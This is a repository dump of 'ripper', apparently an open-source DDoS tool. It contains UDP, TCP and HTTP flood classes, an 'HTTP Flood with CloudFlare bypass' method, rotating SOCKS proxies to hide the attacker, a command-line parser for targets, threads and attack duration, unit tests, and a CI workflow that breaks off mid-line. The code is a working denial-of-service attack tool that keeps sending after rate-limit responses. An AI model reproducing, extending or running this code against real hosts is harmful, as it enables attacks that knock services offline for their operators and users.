self.send(tcp_conn): 45 | if self._ctx.dry_run: 46 | break 47 | continue 48 | 49 | self._target.stats.connect.status_failed() 50 | # self._ctx.sock_manager.close_socket() 51 | 52 | def send(self, sock: socket) -> bool: 53 | send_bytes = generate_random_bytes(self._target.min_random_packet_len, self._target.max_random_packet_len) 54 | try: 55 | sent = sock.send(send_bytes) 56 | except ProxyError as ep: 57 | events_journal.exception(ep, target=self._target) 58 | self._ctx.proxy_manager.delete_proxy_sync(self._proxy) 59 | except Exception as e: 60 | events_journal.exception(e, target=self._target) 61 | else: 62 | self._target.stats.packets.status_sent(sent_bytes=sent) 63 | self._proxy.report_success() if self._proxy is not None else 0 64 | return True 65 | 66 | return False 67 | -------------------------------------------------------------------------------- /ripper/actions/attack.py: -------------------------------------------------------------------------------- 1 | import threading 2 | from threading import Thread, Event 3 | 4 | from ripper.actions.attack_method import AttackMethod 5 | from ripper.actions.http_bypass import 
HttpBypass 6 | from ripper.actions.http_flood import HttpFlood 7 | from ripper.actions.tcp_flood import TcpFlood 8 | from ripper.actions.udp_flood import UdpFlood 9 | from ripper.context.events_journal import EventsJournal 10 | 11 | # Forward Reference 12 | Context = 'Context' 13 | Target = 'Target' 14 | 15 | events_journal = EventsJournal() 16 | 17 | 18 | # noinspection PyTypeChecker 19 | attack_methods: list[AttackMethod] = [ 20 | UdpFlood, 21 | TcpFlood, 22 | HttpFlood, 23 | HttpBypass, 24 | ] 25 | 26 | attack_method_labels: list[str] = list(map(lambda am: am.label, attack_methods)) 27 | 28 | 29 | def attack_method_factory(_ctx: Context, target: Target): 30 | attack_method_name = target.attack_method 31 | # events_journal.info(f'Set attack method to {target.attack_method}', target=target) 32 | if attack_method_name == 'udp-flood': 33 | return UdpFlood(target=target, context=_ctx) 34 | elif attack_method_name == 'http-flood': 35 | return HttpFlood(target=target, context=_ctx) 36 | elif attack_method_name == 'tcp-flood': 37 | return TcpFlood(target=target, context=_ctx) 38 | elif attack_method_name == 'http-bypass': 39 | return HttpBypass(target=target, context=_ctx) 40 | # Dangerous, may lead to exception 41 | return None 42 | 43 | 44 | class Attack(Thread): 45 | """This class creates threads with specified attack method.""" 46 | _ctx: Context 47 | target: Target 48 | stop_event: Event = None 49 | 50 | def __init__(self, _ctx: Context, target: Target): 51 | """ 52 | :param target: Target IPv4 address and destination port. 53 | :param method: Attack method. 54 | """ 55 | Thread.__init__(self, daemon=True) 56 | self._ctx = _ctx 57 | self.target = target 58 | self.target.add_attack_thread(self) 59 | self.stop_event = threading.Event() 60 | 61 | def stop(self): 62 | self.stop_event.set() 63 | 64 | def run(self): 65 | self.target.init() 66 | runner = attack_method_factory(_ctx=self._ctx, target=self.target) 67 | 68 | if self._ctx.dry_run: 69 | runner() 70 | exit(0) 71 | 72 | while not self.stop_event.is_set(): 73 | runner() 74 | -------------------------------------------------------------------------------- /ripper/actions/udp_flood.py: -------------------------------------------------------------------------------- 1 | from contextlib import suppress 2 | from socket import socket 3 | from typing import Any 4 | 5 | from ripper.common import generate_random_bytes 6 | from ripper.context.events_journal import EventsJournal 7 | from ripper.context.target import Target 8 | from ripper.constants import * 9 | from ripper.actions.attack_method import AttackMethod 10 | from ripper.proxy import Proxy 11 | 12 | # Forward Reference 13 | Context = 'Context' 14 | 15 | events_journal = EventsJournal() 16 | 17 | 18 | # TODO add support for SOCKS5 proxy if proxy supports associate request 19 | # https://stackoverflow.com/a/47079318/2628125 20 | # https://datatracker.ietf.org/doc/html/rfc1928 21 | # https://blog.birost.com/a?ID=00100-38682fbb-83c3-49d7-8cfc-406b05bf086c 22 | # PySocks has issues with basic implementation 23 | class UdpFlood(AttackMethod): 24 | """UDP Flood method.""" 25 | 26 | name: str = 'UDP Flood' 27 | label: str = 'udp-flood' 28 | 29 | _sock: socket 30 | _target: Target 31 | _ctx: Context 32 | _proxy: Proxy = None 33 | 34 | def __init__(self, target: Target, context: Context): 35 | self._target = target 36 | self._ctx = context 37 | 38 | def create_connection(self) -> socket: 39 | self._proxy = self._ctx.proxy_manager.get_random_proxy() 40 | conn = 
self._ctx.sock_manager.create_udp_socket() 41 | 42 | return conn 43 | 44 | def __call__(self, *args, **kwargs): 45 | with suppress(Exception), self.create_connection() as udp_conn: 46 | self._target.stats.connect.status_success() 47 | events_journal.info('Creating new UDP connection...', target=self._target) 48 | while self.sendto(udp_conn): 49 | if self._ctx.dry_run: 50 | break 51 | continue 52 | 53 | self._target.stats.connect.status_failed() 54 | # self._ctx.sock_manager.close_socket() 55 | 56 | def sendto(self, sock: socket) -> bool: 57 | try: 58 | send_bytes = generate_random_bytes(self._target.min_random_packet_len, self._target.max_random_packet_len) 59 | sent = sock.sendto(send_bytes, self._target.hostip_port_tuple()) 60 | except socket.gaierror as e: 61 | events_journal.exception(e, target=self._target) 62 | events_journal.error(GETTING_SERVER_IP_ERR_MSG, target=self._target) 63 | except Exception as e: 64 | events_journal.exception(e, target=self._target) 65 | else: 66 | self._target.stats.packets.status_sent(sent_bytes=sent) 67 | return True 68 | 69 | return False 70 | -------------------------------------------------------------------------------- /tests/test_targets_manager_packets_stats.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | import time 3 | from random import randint 4 | 5 | from ripper.context.target import Target 6 | from ripper.targets_manager import TargetsManagerPacketsStats 7 | 8 | 9 | class DescribeTargetsManagerPacketsStats: 10 | def build_targets_list(self): 11 | return [ 12 | Target(target_uri='http://google.com'), 13 | Target(target_uri='http://medium.com'), 14 | Target(target_uri='http://github.com'), 15 | ] 16 | 17 | def increase_target_packets(self, target: Target, total_sent: int, total_sent_bytes: int): 18 | target.stats.packets.total_sent += total_sent 19 | target.stats.packets.total_sent_bytes += total_sent_bytes 20 | 21 | def increase_target_packets_list(self, targets: list[Target]): 22 | tmps1 = TargetsManagerPacketsStats(targets) 23 | before_total_sent = tmps1.total_sent 24 | before_total_sent_bytes = tmps1.total_sent_bytes 25 | expected_total_sent = before_total_sent 26 | expected_total_sent_bytes = before_total_sent_bytes 27 | for target in targets: 28 | sent = randint(0, 10) 29 | sent_bytes = randint(0, 10000) 30 | expected_total_sent += sent 31 | expected_total_sent_bytes += sent_bytes 32 | self.increase_target_packets(target, sent, sent_bytes) 33 | tmps2 = TargetsManagerPacketsStats(targets=targets) 34 | assert tmps2.total_sent == expected_total_sent 35 | assert tmps2.total_sent_bytes == expected_total_sent_bytes 36 | assert tmps2 > tmps1 37 | assert tmps1 < tmps2 38 | 39 | def it_should_accumulate_data_from_targets(self): 40 | targets = self.build_targets_list() 41 | tmps = TargetsManagerPacketsStats(targets=targets) 42 | assert tmps.total_sent == 0 43 | assert tmps.total_sent_bytes == 0 44 | self.increase_target_packets_list(targets) 45 | self.increase_target_packets_list(targets) 46 | self.increase_target_packets_list(targets) 47 | 48 | def it_should_calculate_average_with_duration(self): 49 | targets = self.build_targets_list() 50 | self.increase_target_packets_list(targets) 51 | tmps = TargetsManagerPacketsStats(targets=targets) 52 | avg_sent_per_second = tmps.avg_sent_per_second 53 | avg_sent_bytes_per_second = tmps.avg_sent_bytes_per_second 54 | time.sleep(1) 55 | tmps = TargetsManagerPacketsStats(targets=targets) 56 | assert avg_sent_per_second > tmps.avg_sent_per_second 57 | 
assert avg_sent_bytes_per_second > tmps.avg_sent_bytes_per_second 58 | -------------------------------------------------------------------------------- /tests/test_attack_http_flood.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | from collections import namedtuple 3 | 4 | from ripper.actions.http_flood import HttpFlood 5 | from ripper.context.context import Context 6 | from ripper.headers_provider import HeadersProvider 7 | 8 | Args = namedtuple('Args', 'targets http_method threads_count') 9 | 10 | 11 | class DescribeHttpFloodAttackMethod: 12 | target_uri: str = 'tcp://localhost' 13 | 14 | def it_has_some_headers(self): 15 | args = Args( 16 | targets=[self.target_uri], 17 | http_method='GET', 18 | threads_count=100, 19 | ) 20 | ctx = Context(args) 21 | ctx.__init__(args) 22 | http_flood_am = HttpFlood(target=ctx.targets_manager.targets[0], context=ctx) 23 | 24 | actual = http_flood_am.headers() 25 | assert actual.get('Content-Length') == '0' 26 | with_content = http_flood_am.headers('{"test": 1}') 27 | assert with_content.get('Content-Length') == '11' 28 | 29 | def it_has_payload(self): 30 | args = Args( 31 | targets=[self.target_uri], 32 | http_method='POST', 33 | threads_count=100, 34 | ) 35 | ctx = Context(args) 36 | ctx.__init__(args) 37 | ctx.headers_provider.user_agents = ['Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0'] 38 | http_flood_am = HttpFlood(target=ctx.targets_manager.targets[0], context=ctx) 39 | 40 | body = '{"test":1}' 41 | headers = '\r\n'.join([f'{key}: {value}' for (key, value) in http_flood_am.headers().items()]) 42 | expected = 'POST / HTTP/1.1\r\nHost: localhost\r\n' + headers + '\r\n\r\n' 43 | 44 | payload = http_flood_am.payload() 45 | assert payload.split('\r\n') == expected.split('\r\n') 46 | 47 | payload_with_body = http_flood_am.payload(body) 48 | headers_with_body = '\r\n'.join([f'{key}: {value}' for (key, value) in http_flood_am.headers(body).items()]) 49 | expected_with_body = 'POST / HTTP/1.1\r\nHost: localhost\r\n' + headers_with_body + '\r\n' + f'{body}\r\n\r\n' 50 | assert payload_with_body.split('\r\n') == expected_with_body.split('\r\n') 51 | 52 | def it_has_correct_name(self): 53 | args = Args( 54 | targets=[self.target_uri], 55 | http_method='GET', 56 | threads_count=100, 57 | ) 58 | ctx = Context(args) 59 | ctx.__init__(args) 60 | http_flood_am = HttpFlood(target=ctx.targets_manager.targets[0], context=ctx) 61 | assert http_flood_am.name == 'HTTP Flood' 62 | assert http_flood_am.label == 'http-flood' 63 | 64 | @pytest.fixture(scope='session', autouse=True) 65 | def refresh_headers_provider(self): 66 | HeadersProvider().refresh() 67 | -------------------------------------------------------------------------------- /ripper/proxy.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import socks 3 | import time 4 | from enum import Enum 5 | 6 | from ripper.common import ns2s 7 | 8 | 9 | class ProxyType(Enum): 10 | SOCKS4 = 'SOCKS4' 11 | SOCKS5 = 'SOCKS5' 12 | HTTP = 'HTTP' 13 | 14 | 15 | class Proxy: 16 | def __init__(self, host: str, port: int, username: str = None, password: str = None, proxy_type: ProxyType = ProxyType.SOCKS5, rdns: bool = True): 17 | self.host = host 18 | self.port = int(port) 19 | self.username = username 20 | self.password = password 21 | self.rdns = rdns 22 | self.proxy_type = proxy_type 23 | 24 | self.last_success_time = 0 25 | self.success_cnt = 0 26 | self.last_failure_time = 0 27 | 
        self.failure_cnt = 0
28 | 
29 |     def report_success(self):
30 |         self.last_success_time = time.time_ns()
31 |         self.success_cnt += 1
32 | 
33 |     def report_failure(self):
34 |         self.last_failure_time = time.time_ns()
35 |         self.failure_cnt += 1
36 | 
37 |     def seconds_to_last_success(self):
38 |         now_ns = time.time_ns()
39 |         return ns2s(now_ns - self.last_success_time)
40 | 
41 |     def seconds_to_last_failure(self):
42 |         now_ns = time.time_ns()
43 |         return ns2s(now_ns - self.last_failure_time)
44 | 
45 |     # mutates socket
46 |     # https://pypi.org/project/PySocks/
47 |     def decorate_socket(self, s):
48 |         if self.username and self.password:
49 |             s.set_proxy(socks.PROXY_TYPE_SOCKS5, self.host, self.port,
50 |                         self.rdns, self.username, self.password)
51 |         else:
52 |             s.set_proxy(socks.PROXY_TYPE_SOCKS5,
53 |                         self.host, self.port, self.rdns)
54 |         return s
55 | 
56 |     def id(self):
57 |         if self.username and self.password:
58 |             return f'SOCKS5:{self.host}:{self.port}:{self.rdns}:{self.username}:{self.password}'
59 |         else:
60 |             return f'SOCKS5:{self.host}:{self.port}:{self.rdns}'
61 | 
62 |     def __eq__(self, other):
63 |         if not isinstance(other, Proxy):
64 |             # don't attempt to compare against unrelated types
65 |             return NotImplemented
66 | 
67 |         return self.host == other.host \
68 |             and self.port == other.port \
69 |             and self.username == other.username \
70 |             and self.password == other.password \
71 |             and self.rdns == other.rdns
72 | 
73 |     def validate(self):
74 |         try:
75 |             http_socket = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
76 |             self.decorate_socket(http_socket)
77 |             http_socket.settimeout(5)
78 |             http_socket.connect(('google.com', 80))
79 |         # except socks.ProxyError:
80 |         except:
81 |             return False
82 |         return True
83 | 
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | # Created by .ignore support plugin (hsz.mobi)
 2 | ### Python template
 3 | # Byte-compiled / optimized / DLL files
 4 | __pycache__/
 5 | *.py[cod]
 6 | *$py.class
 7 | 
 8 | # C extensions
 9 | *.so
10 | 
11 | # Distribution / packaging
12 | .Python
13 | build/
14 | develop-eggs/
15 | dist/
16 | downloads/
17 | eggs/
18 | .eggs/
19 | lib/
20 | lib64/
21 | parts/
22 | sdist/
23 | var/
24 | wheels/
25 | pip-wheel-metadata/
26 | share/python-wheels/
27 | *.egg-info/
28 | .installed.cfg
29 | *.egg
30 | MANIFEST
31 | 
32 | # PyInstaller
33 | # Usually these files are written by a python script from a template
34 | # before PyInstaller builds the exe, so as to inject date/other infos into it.
35 | *.manifest 36 | *.spec 37 | 38 | # Installer logs 39 | pip-log.txt 40 | pip-delete-this-directory.txt 41 | 42 | # Unit test / coverage reports 43 | htmlcov/ 44 | .tox/ 45 | .nox/ 46 | .coverage 47 | .coverage.* 48 | .cache 49 | nosetests.xml 50 | coverage.xml 51 | *.cover 52 | *.py,cover 53 | .hypothesis/ 54 | .pytest_cache/ 55 | cover/ 56 | 57 | # Translations 58 | *.mo 59 | *.pot 60 | 61 | # Django stuff: 62 | *.log 63 | local_settings.py 64 | db.sqlite3 65 | db.sqlite3-journal 66 | 67 | # Flask stuff: 68 | instance/ 69 | .webassets-cache 70 | 71 | # Scrapy stuff: 72 | .scrapy 73 | 74 | # Sphinx documentation 75 | docs/_build/ 76 | 77 | # PyBuilder 78 | .pybuilder/ 79 | target/ 80 | 81 | # Jupyter Notebook 82 | .ipynb_checkpoints 83 | 84 | # IPython 85 | profile_default/ 86 | ipython_config.py 87 | 88 | # pyenv 89 | # For a library or package, you might want to ignore these files since the code is 90 | # intended to run in multiple environments; otherwise, check them in: 91 | # .python-version 92 | 93 | # pipenv 94 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 95 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 96 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 97 | # install all needed dependencies. 98 | #Pipfile.lock 99 | 100 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow 101 | __pypackages__/ 102 | 103 | # Celery stuff 104 | celerybeat-schedule 105 | celerybeat.pid 106 | 107 | # SageMath parsed files 108 | *.sage.py 109 | 110 | # Environments 111 | .env 112 | .venv 113 | env/ 114 | venv/ 115 | ENV/ 116 | env.bak/ 117 | venv.bak/ 118 | 119 | # Spyder project settings 120 | .spyderproject 121 | .spyproject 122 | 123 | # Rope project settings 124 | .ropeproject 125 | 126 | # mkdocs documentation 127 | /site 128 | 129 | # mypy 130 | .mypy_cache/ 131 | .dmypy.json 132 | dmypy.json 133 | 134 | # Pyre type checker 135 | .pyre/ 136 | 137 | # pytype static type analyzer 138 | .pytype/ 139 | 140 | # Cython debug symbols 141 | cython_debug/ 142 | 143 | .idea/ 144 | 145 | # Proxy lists 146 | proxylist.txt 147 | 148 | # Debug 149 | debug.log 150 | -------------------------------------------------------------------------------- /ripper/actions/http_bypass.py: -------------------------------------------------------------------------------- 1 | import time 2 | from contextlib import suppress 3 | 4 | from cloudscraper import CloudScraper, create_scraper 5 | from requests import Response 6 | 7 | from ripper.actions.http_flood import HttpFlood 8 | from ripper.context.target import Target 9 | from ripper.context.events_journal import EventsJournal 10 | 11 | # Forward Reference 12 | Context = 'Context' 13 | 14 | events_journal = EventsJournal() 15 | 16 | 17 | class RateLimitException(BaseException): 18 | """Exception raised for rate limit response.""" 19 | 20 | code: int 21 | """Error code""" 22 | message: str 23 | """Description of the error""" 24 | 25 | def __init__(self, code: int, message: str): 26 | self.code = code 27 | self.message = message 28 | super().__init__(self.message) 29 | 30 | def __str__(self): 31 | return f'{self.code}: {self.message}' 32 | 33 | 34 | class HttpBypass(HttpFlood): 35 | """HTTP Flood method with CloudFlare bypass .""" 36 | 37 | name: str = 'HTTP Flood with CloudFlare bypass' 38 | label: str = 'http-bypass' 39 | 40 | _http_connect: CloudScraper = None 41 | 42 | def __init__(self, target: Target, context: Context): 43 
| super().__init__(target, context) 44 | 45 | def __call__(self, *args, **kwargs): 46 | browser = { 47 | 'browser': 'chrome', 48 | 'platform': 'android', 49 | 'desktop': False 50 | } 51 | with suppress(Exception), create_scraper(browser=browser) as self._http_connect: 52 | self._target.stats.connect.status_success() 53 | events_journal.info('Creating CloudFlare scraper connection.', target=self._target) 54 | while self.send(self._http_connect): 55 | if self._ctx.dry_run: 56 | break 57 | continue 58 | self._target.stats.connect.status_failed() 59 | 60 | def send(self, scraper: CloudScraper): 61 | try: 62 | with scraper.get(self._target.http_url, 63 | headers=self._ctx.headers_provider.headers, 64 | proxies=self._proxy) as response: 65 | self._target.stats.http_stats[response.status_code] += 1 66 | self.check_rate_limit(response) 67 | except RateLimitException as e: 68 | events_journal.warn( 69 | f'{type(e).__name__} {e.__str__()}, sleep for 3 sec', target=self._target) 70 | time.sleep(3.01) 71 | return True 72 | except Exception as e: 73 | events_journal.exception(e, target=self._target) 74 | else: 75 | sent_bytes = self._size_of_request(response.request) 76 | self._target.stats.packets.status_sent(sent_bytes) 77 | self._proxy.report_success() if self._proxy is not None else 0 78 | return True 79 | return False 80 | 81 | @staticmethod 82 | def check_rate_limit(response: Response): 83 | """Check status code for Rate limits applied and throws exception.""" 84 | if response.status_code in [429, 460, 463, 520, 521, 522, 523, 524, 525, 526, 527]: 85 | raise RateLimitException(response.status_code, response.reason) 86 | 87 | @staticmethod 88 | def _size_of_request(request) -> int: 89 | size: int = len(request.method) +\ 90 | len(request.url) + \ 91 | len('\r\n'.join(f'{k}: {v}' for k, v in request.headers.items())) 92 | return size 93 | -------------------------------------------------------------------------------- /ripper/proxy_manager.py: -------------------------------------------------------------------------------- 1 | import random 2 | import threading 3 | from typing import List 4 | 5 | from ripper.common import read_file_lines 6 | from ripper.proxy import Proxy, ProxyType 7 | from ripper.constants import PROXY_MAX_FAILURE_RATIO, PROXY_MIN_VALIDATION_REQUESTS 8 | 9 | lock = threading.Lock() 10 | 11 | 12 | class ProxyManager: 13 | """Manager for proxy collection.""" 14 | 15 | proxy_list: list[Proxy] = [] 16 | """Active proxies.""" 17 | proxy_list_initial_len: int = 0 18 | """Count of proxies during the last application.""" 19 | __proxy_extract_counter: int = 0 20 | """Vacuum operation is called automatically on every PROXY_MIN_VALIDATION_REQUESTS proxy extractions.""" 21 | proxy_type: ProxyType = ProxyType.SOCKS5 22 | """Type of proxy (SOCKS5, SOCKS4, HTTP)""" 23 | 24 | def set_proxy_type(self, proxy_type: str): 25 | proxy_type_lc = proxy_type.lower() 26 | if proxy_type_lc == 'socks5': 27 | self.proxy_type = ProxyType.SOCKS5 28 | elif proxy_type_lc == 'socks4': 29 | self.proxy_type = ProxyType.SOCKS4 30 | elif proxy_type_lc == 'http': 31 | self.proxy_type = ProxyType.HTTP 32 | else: 33 | self.proxy_type = None 34 | 35 | def set_proxy_list(self, proxy_list: list[Proxy]): 36 | self.proxy_list = proxy_list 37 | self.proxy_list_initial_len = len(proxy_list) 38 | 39 | # TODO prioritize faster proxies 40 | def get_random_proxy(self) -> Proxy: 41 | self.__proxy_extract_counter += 1 42 | if self.__proxy_extract_counter % PROXY_MIN_VALIDATION_REQUESTS == 0: 43 | self.vacuum() 44 | if not 
self.proxy_list or not len(self.proxy_list): 45 | return None 46 | return random.choice(self.proxy_list) 47 | 48 | def find_proxy_index(self, proxy: Proxy) -> int: 49 | """Returns -1 if not found.""" 50 | try: 51 | return self.proxy_list.index(proxy) 52 | # except ValueError: 53 | except: 54 | return -1 55 | 56 | def __delete_proxy(self, proxy: Proxy) -> bool: 57 | index = self.find_proxy_index(proxy) 58 | if index >= 0: 59 | self.proxy_list.pop(index) 60 | return index >= 0 61 | 62 | def delete_proxy_sync(self, proxy: Proxy) -> bool: 63 | lock.acquire() 64 | is_deleted = self.__delete_proxy(proxy) 65 | lock.release() 66 | return is_deleted 67 | 68 | def __validate_proxy(self, proxy: Proxy) -> bool: 69 | total_cnt = proxy.success_cnt + proxy.failure_cnt 70 | if total_cnt < PROXY_MIN_VALIDATION_REQUESTS: 71 | return True 72 | failure_ratio = proxy.failure_cnt / proxy.success_cnt 73 | return failure_ratio < PROXY_MAX_FAILURE_RATIO 74 | 75 | def vacuum(self) -> int: 76 | """Removes proxies which are not valid.""" 77 | new_proxy_list = list(filter(lambda proxy: self.__validate_proxy(proxy), self.proxy_list)) 78 | cnt = len(self.proxy_list) - len(new_proxy_list) 79 | if cnt > 0: 80 | self.proxy_list = new_proxy_list 81 | return cnt 82 | 83 | def __parse_proxy_line(self, line: str) -> Proxy: 84 | # ip:port:username:password or ip:port 85 | args = line.strip().split(':') 86 | if len(args) not in [2, 4]: 87 | raise ValueError(args) 88 | return Proxy(*args, proxy_type=self.proxy_type) 89 | 90 | def __parse_proxy_lines(self, lines: list[str]) -> Proxy: 91 | proxy_list = [] 92 | for line in lines: 93 | proxy_list.append(self.__parse_proxy_line(line)) 94 | return proxy_list 95 | 96 | def update_proxy_list_from_file(self, filename: str) -> List[Proxy]: 97 | lines = read_file_lines(filename) 98 | proxy_list = self.__parse_proxy_lines(lines) 99 | self.set_proxy_list(proxy_list) 100 | return proxy_list 101 | -------------------------------------------------------------------------------- /ripper/arg_parser.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from optparse import OptionParser, IndentedHelpFormatter 3 | 4 | from ripper.constants import * 5 | from ripper.actions.attack import attack_method_labels 6 | 7 | 8 | def create_parser() -> OptionParser: 9 | """Initialize parser with options.""" 10 | formatter = IndentedHelpFormatter( 11 | indent_increment=2, 12 | max_help_position=56, 13 | width=120, 14 | short_first=1 15 | ) 16 | parser = OptionParser(usage=USAGE, epilog=EPILOG, version=f'%prog {VERSION}', formatter=formatter) 17 | parser_add_options(parser) 18 | 19 | return parser 20 | 21 | 22 | def parser_add_options(parser: OptionParser) -> None: 23 | """Add options to a parser.""" 24 | parser.add_option('-s', '--targets', 25 | dest='targets', action='append', 26 | help='Attack target in {scheme}://{hostname}[:{port}][{path}] format. Multiple targets allowed.') 27 | parser.add_option('--targets-list', 28 | dest='targets_list', type='str', 29 | help='File (fs or http/https) with targets in {scheme}://{hostname}[:{port}][{path}] line format.') 30 | parser.add_option('-m', '--method', 31 | dest='attack_method', type='str', 32 | help=f'Attack method: {", ".join(attack_method_labels)}') 33 | parser.add_option('-e', '--http-method', 34 | dest='http_method', type='str', default=ARGS_DEFAULT_HTTP_ATTACK_METHOD, 35 | help=f'HTTP method. 
Default: {ARGS_DEFAULT_HTTP_ATTACK_METHOD}') 36 | parser.add_option('-t', '--threads', 37 | dest='threads_count', type='str', default=ARGS_DEFAULT_THREADS_COUNT, 38 | help=f'Total fixed threads count (number) or "auto" (text) for automatic threads selection. Default: {ARGS_DEFAULT_THREADS_COUNT}') 39 | parser.add_option('--min-random-packet-len', 40 | dest='min_random_packet_len', type='int', 41 | help=f'Min random packets length. Default: {DEFAULT_MIN_RND_PACKET_LEN}') 42 | parser.add_option('-l', '--max-random-packet-len', 43 | dest='max_random_packet_len', type='int', 44 | help=f'Max random packets length. Default: {DEFAULT_MAX_RND_PACKET_LEN} for udp/tcp') 45 | parser.add_option('-y', '--proxy-list', 46 | dest='proxy_list', 47 | help='File (fs or http/https) with proxies in ip:port:username:password line format. Proxies will be ignored in udp attack!') 48 | parser.add_option('-k', '--proxy-type', 49 | dest='proxy_type', type='str', default=ARGS_DEFAULT_PROXY_TYPE, 50 | help=f'Type of proxy to work with. Supported types: socks5, socks4, http. Default: {ARGS_DEFAULT_PROXY_TYPE}') 51 | parser.add_option('-c', '--health-check', 52 | dest='health_check', type='int', default=ARGS_DEFAULT_HEALTH_CHECK, 53 | help=f'Controls health check availability. Turn on: 1, turn off: 0. Default: {ARGS_DEFAULT_HEALTH_CHECK}') 54 | parser.add_option('-o', '--socket-timeout', 55 | # default value is not set here to keep dynamic logic during initialization 56 | dest='socket_timeout', type='int', default=ARGS_DEFAULT_SOCK_TIMEOUT, 57 | help=f'Timeout for socket connection is seconds. Default (seconds): {ARGS_DEFAULT_SOCK_TIMEOUT} without proxy, {2*ARGS_DEFAULT_SOCK_TIMEOUT} with proxy') 58 | parser.add_option('--dry-run', 59 | dest='dry_run', action="store_true", 60 | help='Print formatted output without full script running.') 61 | parser.add_option('--log-size', 62 | dest='log_size', type='int', default=DEFAULT_LOG_SIZE, 63 | help='Set the Events Log history frame length.') 64 | parser.add_option('--log-level', 65 | dest='event_level', type='str', default=DEFAULT_LOG_LEVEL, 66 | help='Log level for events board. Supported levels: info, warn, error, none.') 67 | parser.add_option('-d', '--duration', 68 | dest='duration', type='int', 69 | help='Attack duration in seconds. 
After this duration script will stop it\'s execution.') 70 | 71 | def print_usage(): 72 | """Wrapper for Logo with help.""" 73 | print(LOGO_NOCOLOR) 74 | create_parser().print_help() 75 | 76 | sys.exit() 77 | -------------------------------------------------------------------------------- /ripper/context/events_journal.py: -------------------------------------------------------------------------------- 1 | import datetime 2 | import textwrap 3 | import threading 4 | from queue import Queue 5 | 6 | from ripper.constants import * 7 | from ripper.common import Singleton 8 | 9 | Target = 'Target' 10 | 11 | 12 | class EventLevel: 13 | none: int = 0 14 | error: int = 1 15 | warn: int = 2 16 | info: int = 3 17 | 18 | @staticmethod 19 | def get_id_by_name(name: str) -> int: 20 | if name == 'none': 21 | return EventLevel.none 22 | if name == 'error': 23 | return EventLevel.error 24 | if name == 'warn': 25 | return EventLevel.warn 26 | if name == 'info': 27 | return EventLevel.info 28 | 29 | @staticmethod 30 | def get_name_by_id(id: int) -> str: 31 | if id == EventLevel.none: 32 | return 'none' 33 | if id == EventLevel.error: 34 | return 'error' 35 | if id == EventLevel.warn: 36 | return 'warn' 37 | if id == EventLevel.info: 38 | return 'info' 39 | 40 | 41 | class Event: 42 | _level: int = EventLevel.none 43 | _target: Target = None 44 | _message: str = None 45 | 46 | def __init__(self, level: int, message: str, target: Target = None): 47 | self._level = level 48 | self._message = message 49 | self._target = target 50 | 51 | def get_level_color(self): 52 | if self._level == EventLevel.warn: 53 | return 'bold orange1 reverse' 54 | if self._level == EventLevel.error: 55 | return 'bold white on red3' 56 | return 'bold blue reverse' 57 | 58 | def format_message(self): 59 | now = datetime.datetime.now().strftime(DATE_TIME_SHORT) 60 | thread_name = threading.current_thread().name.lower() 61 | log_level_name = EventLevel.get_name_by_id(self._level) 62 | log_level_color = self.get_level_color() 63 | locator = f'target-{self._target.index}' if self._target is not None else 'global' 64 | msg_limited = textwrap.shorten(self._message, width=50, placeholder='...') 65 | return f'[dim][bold][cyan][{now}][/] [{log_level_color}]{log_level_name:^7}[/] {locator:9} {thread_name:11} {msg_limited}' 66 | 67 | 68 | class EventsJournal(metaclass=Singleton): 69 | """Collect and represent various logs and events_journal.""" 70 | _lock = None 71 | _queue: Queue = None 72 | _buffer: list[str] = None 73 | _max_event_level: int = EventLevel.none 74 | 75 | def __init__(self): 76 | self._lock = threading.Lock() 77 | self._queue = Queue() 78 | self.set_log_size(DEFAULT_LOG_SIZE) 79 | self.set_max_event_level(DEFAULT_LOG_LEVEL) 80 | 81 | def set_log_size(self, size): 82 | self._buffer = [''] * size 83 | 84 | def set_max_event_level(self, max_event_level_name: str): 85 | self._max_event_level = EventLevel.get_id_by_name(max_event_level_name) 86 | 87 | def get_max_event_level(self): 88 | return self._max_event_level 89 | 90 | def get_log(self) -> list[str]: 91 | with self._lock: 92 | if not self._queue.empty(): 93 | self._buffer.pop(0) 94 | self._buffer.append(self._queue.get()) 95 | 96 | return self._buffer 97 | 98 | def info(self, message: str, target: Target = None): 99 | if self._max_event_level >= EventLevel.info: 100 | self._push_event(Event( 101 | level=EventLevel.info, 102 | message=message, 103 | target=target, 104 | )) 105 | 106 | def warn(self, message: str, target: Target = None): 107 | if self._max_event_level >= 
EventLevel.warn: 108 | self._push_event(Event( 109 | level=EventLevel.warn, 110 | message=message, 111 | target=target, 112 | )) 113 | 114 | def error(self, message: str, target: Target = None): 115 | if self._max_event_level >= EventLevel.error: 116 | self._push_event(Event( 117 | level=EventLevel.error, 118 | message=message, 119 | target=target, 120 | )) 121 | 122 | def exception(self, ex, target: Target = None): 123 | self._push_event(Event( 124 | level=EventLevel.error, 125 | message=f'{type(ex).__name__}: {ex.__str__()[:128]}', 126 | target=target, 127 | )) 128 | 129 | def _push_event(self, event: Event): 130 | with self._lock: 131 | self._queue.put(event.format_message()) 132 | -------------------------------------------------------------------------------- /.github/workflows/build.yml: -------------------------------------------------------------------------------- 1 | name: Build 2 | 3 | on: 4 | push: 5 | paths-ignore: 6 | - '**.md' 7 | pull_request: 8 | paths-ignore: 9 | - '**.md' 10 | 11 | defaults: 12 | run: 13 | shell: pwsh 14 | 15 | env: 16 | IMAGE_NAME: alexmon1989/dripper 17 | 18 | jobs: 19 | build: 20 | name: Build on ${{ matrix.os }} 21 | runs-on: ${{ matrix.os }} 22 | strategy: 23 | fail-fast: false 24 | matrix: 25 | os: [ ubuntu-20.04, macos-11, windows-2019 ] 26 | 27 | steps: 28 | - name: Checkout 29 | uses: actions/checkout@v2 30 | 31 | - name: Setup Python 32 | uses: actions/setup-python@v2 33 | with: 34 | python-version: 3.x 35 | 36 | - name: Set environment variables 37 | shell: bash 38 | run: | 39 | # Short name for current branch. For PRs, use target branch (base ref) 40 | GIT_BRANCH=${GITHUB_BASE_REF:-${GITHUB_REF#refs/heads/}} 41 | echo 